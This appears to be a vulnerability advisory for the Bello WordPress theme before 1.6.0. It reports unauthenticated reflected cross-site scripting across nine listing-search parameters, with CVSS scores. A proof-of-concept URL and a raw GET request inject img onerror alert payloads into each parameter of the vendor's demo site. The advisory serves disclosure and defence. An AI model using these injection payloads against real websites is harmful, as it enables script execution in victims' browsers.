M0zeWPVDB-ID:6B5B42FD-028A-4405-B027-3266058029BBBello < 1.6.0 - Unauthenticated Reflected XSS & XFS
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
The theme did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
PoC
– [ Payloads: ] [$] 13"–>">'--
[$] ### – [ PoC | Unauthenticated Reflected XSS & XFS | Listing search query: ] [!] https://bello.bold-themes.com/main-demo/listing/?listing_list_view=standard13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`listing_list_view`);>&bt;_bb_listing_field_my_lat=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_my_lat`);>&bt;_bb_listing_field_my_lng=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_my_lng`);>&bt;_bb_listing_field_distance_value=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_distance_value`);>&bt;_bb_listing_field_my_lat_default=13&bt;_bb_listing_field_my_lng_default=13&bt;_bb_listing_field_keyword=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_keyword`);>&bt;_bb_listing_field_location_autocomplete=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);>&bt;_bb_listing_field_category=all&bt;_bb_listing_field_price_range_from=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_price_range_from`);>&bt;_bb_listing_field_price_range_to=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_price_range_to`);> [!] GET /main-demo/listing/?listing_list_view=standard13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(listing_list_view);%3E&bt;_bb_listing_field_my_lat=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_my_lat);%3E&bt;_bb_listing_field_my_lng=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_my_lng);%3E&bt;_bb_listing_field_distance_value=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_distance_value);%3E&bt;_bb_listing_field_my_lat_default=13&bt;_bb_listing_field_my_lng_default=13&bt;_bb_listing_field_keyword=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_keyword);%3E&bt;_bb_listing_field_location_autocomplete=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_location_autocomplete);%3E&bt;_bb_listing_field_category=all&bt;_bb_listing_field_price_range_from=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_price_range_from);%3E&bt;_bb_listing_field_price_range_to=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_price_range_to);%3E HTTP/1.1 Host: bello.bold-themes.com
Related
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N